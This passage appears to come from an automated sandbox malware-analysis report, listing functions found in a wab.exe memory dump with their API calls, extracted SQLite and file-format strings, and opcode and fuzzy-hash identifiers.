                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: wcscat$_snwprintfmemset
                                                                                                                                                                                                                    • String ID: %2.2X
                                                                                                                                                                                                                    • API String ID: 2521778956-791839006
                                                                                                                                                                                                                    • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                                                                                    • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _snwprintfwcscpy
                                                                                                                                                                                                                    • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                                                                                    • API String ID: 999028693-502967061
                                                                                                                                                                                                                    • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                                                                                    • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00408D96 Relevance: 10.2, APIs: 8, Instructions: 159stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$memsetstrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2350177629-0
                                                                                                                                                                                                                    • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                                                                                                                                    • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0042ADCD Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                    • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                                                                                    • API String ID: 2221118986-1606337402
                                                                                                                                                                                                                    • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                                                                                                                                    • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00408F2F Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 265355444-0
                                                                                                                                                                                                                    • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                                                                                                                                    • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040C3C3 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                                                                                                                                                                      • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                                                                                                                                                                      • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                                                      • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C439
                                                                                                                                                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                                                    • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1973883786-0
                                                                                                                                                                                                                    • Opcode ID: 43de9e52db830488c7ebdb2928a6c49d702693ce72869a855233a6d80c0cc9be
                                                                                                                                                                                                                    • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 43de9e52db830488c7ebdb2928a6c49d702693ce72869a855233a6d80c0cc9be
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004116FF
                                                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                                      • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                                      • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                                                                                                                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                                                                                                                                                                      • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                                                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                                                    • API String ID: 2618321458-3614832568
                                                                                                                                                                                                                    • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                                                                                    • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004185FC
                                                                                                                                                                                                                    • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@AttributesFilememset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 776155459-0
                                                                                                                                                                                                                    • Opcode ID: 7a9323aad94e24d1be4080513bc7e6f3ed6a266ca59275ba5ce2a6d3a44692dd
                                                                                                                                                                                                                    • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7a9323aad94e24d1be4080513bc7e6f3ed6a266ca59275ba5ce2a6d3a44692dd
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                                                                                                                    • malloc.MSVCRT ref: 00417524
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2308052813-0
                                                                                                                                                                                                                    • Opcode ID: 726b282c5ce891bd13be6d49280dde48b664c9abca31c80fca4e8053420f6cc1
                                                                                                                                                                                                                    • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 726b282c5ce891bd13be6d49280dde48b664c9abca31c80fca4e8053420f6cc1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                                                                                                                                    • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PathTemp$??3@
                                                                                                                                                                                                                    • String ID: %s\etilqs_$etilqs_
                                                                                                                                                                                                                    • API String ID: 1589464350-1420421710
                                                                                                                                                                                                                    • Opcode ID: e349944c00f8d49a0493748d5881d0d50fc5388be029f354eaf4c315693a2c66
                                                                                                                                                                                                                    • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e349944c00f8d49a0493748d5881d0d50fc5388be029f354eaf4c315693a2c66
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040FD9E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040FDD5
                                                                                                                                                                                                                      • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                                                                                                                                                                                                                      • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                                                      • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                                                                                    • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                                                    • API String ID: 1775345501-2769808009
                                                                                                                                                                                                                    • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                                                                                                                                    • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00414770 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0041477F
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0041479A
                                                                                                                                                                                                                    • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: wcscpy$CloseCreateFileHandle
                                                                                                                                                                                                                    • String ID: General
                                                                                                                                                                                                                    • API String ID: 999786162-26480598
                                                                                                                                                                                                                    • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                                                                                    • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                                                                                    • String ID: Error$Error %d: %s
                                                                                                                                                                                                                    • API String ID: 313946961-1552265934
                                                                                                                                                                                                                    • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                                                                                    • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: foreign key constraint failed$new$oid$old
                                                                                                                                                                                                                    • API String ID: 0-1953309616
                                                                                                                                                                                                                    • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                                                    • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                                                                                                                    • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                                                                                                                    • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                    • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                    • API String ID: 3510742995-272990098
                                                                                                                                                                                                                    • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                                                    • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                                                    • String ID: gj
                                                                                                                                                                                                                    • API String ID: 1297977491-4203073231
                                                                                                                                                                                                                    • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                                                                                    • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
